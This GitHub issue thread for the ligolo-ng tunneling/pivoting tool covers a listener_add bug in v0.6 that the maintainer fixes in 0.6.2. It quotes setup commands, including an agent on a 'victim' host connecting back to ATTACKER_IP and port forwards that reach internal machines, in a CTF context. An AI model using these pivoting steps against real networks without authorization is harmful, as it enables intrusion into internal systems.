nicocha30 / ligolo-ng

An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.
GNU General Public License v3.0

listener_add feature not working in v0.6 #80

Closed R0ttCyph3r closed 2 months ago

R0ttCyph3r commented 2 months ago

I was not able to stop listeners in v0.5.2, so I downloaded the latest version to test it out. I started a listener and stopped it; the feature was working fine. But when I started a new listener to test some things, to my surprise I was not getting any results.

I get connections if the port is open on netcat, but if it is something like python3 -m http.server or a Sliver mTLS listener

nicocha30 commented 2 months ago

Hey @R0ttCyph3r,

Just tested on Windows 10 and Linux (with Python http.server), no issues. Can you share more details?

R0ttCyph3r commented 2 months ago

Hey @nicocha30, sorry for ghosting this issue; I was not in touch with my PC due to some travels.

Can you tell me how you added it such that it was working? I do the following:

Our machine

sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:8080

Target machine

.\agent.exe -connect ATTACKER_IP:PORT -ignore-cert

Our machine

session
sudo ip route add TARGET_IP/SUBNET_MASK dev ligolo
start

Webserver setup

Our machine

listener_add --addr 0.0.0.0:8000 --to 127.0.0.1:8000

After this, when I do

curl http://attacker_ip:8000/something

even if I do it from a browser on the target,

I don't get a request on my Linux machine,

but if the same port is exposed through netcat, I can connect to it.

quentains commented 2 months ago

Hello there!

Just discovered this project, this is an insane tool!

I experience the exact same problem as @R0ttCyph3r. I see a connection back on a classic nc listener, but the HTTP connection to my Python webserver is impossible.

I tried to downgrade to v0.5.2, and this is working like a charm.

I'm using the same simple setup as shown above by the author (tested on a CTF environment with Kali & Windows Server 2022).

nicocha30 commented 2 months ago

Are you using the same version between the agent and the proxy?

quentains commented 2 months ago

> Are you using the same version between the agent and the proxy?

Completely sure, I only downloaded the last version (v.0.6.1) binaries before trying to downgrade.

nicocha30 commented 2 months ago

@R0ttCyph3r

You are binding to localhost (--to 127.0.0.1:8000):

listener_add --addr 0.0.0.0:8000 --to 127.0.0.1:8000

And reaching using the external IP:

curl http://attacker_ip:8000/something

Wouldn't that be the problem?

I tested on every system I could, using netcat and a Python http server, over the internet, and I couldn't reproduce this issue.

Can you share a lot more details? Agent system, Proxy system, network settings, routes, command history (on ligolo and on the systems).

quentains commented 2 months ago

On my end I first followed the README + double-checked a few YouTube videos, nothing worked.

I'm sure I went for listener_add --addr 0.0.0.0:<victim port> --to 127.0.0.1:<kali port> and then tried to GET a file against my Kali webserver from the second victim box using the first victim IP (in the same subnet as the second internal machine).

I may have the time to reproduce the bug and share more details later today. But I reused the exact same setup with v.0.5.2 and it worked directly.

R0ttCyph3r commented 2 months ago

> @R0ttCyph3r
>
> You are binding to localhost (--to 127.0.0.1:8000):
>
> listener_add --addr 0.0.0.0:8000 --to 127.0.0.1:8000
>
> And reaching using the external IP:
>
> curl http://attacker_ip:8000/something
>
> Wouldn't that be the problem?
>
> I tested on every system I could, using netcat and a Python http server, over the internet, and I couldn't reproduce this issue.
>
> Can you share a lot more details? Agent system, Proxy system, network settings, routes, command history (on ligolo and on the systems).

I am pretty sure this never caused me an issue prior to the latest version; I have been using the same commands for the past year.

I am using Arch Linux as host (where the proxy runs) and Ubuntu as target (where the agent is running). I checked the versions of both proxy and agent, and tried on Windows too; it didn't work. Can you share your commands if they differ from mine?

The target is dual-homed, with pretty straightforward networking.

nicocha30 commented 2 months ago

@R0ttCyph3r / @quentains can you try with the new 0.6.2 version? I reverted to the old protocol.

R0ttCyph3r commented 2 months ago

Just tested, it's working fine with 0.6.2.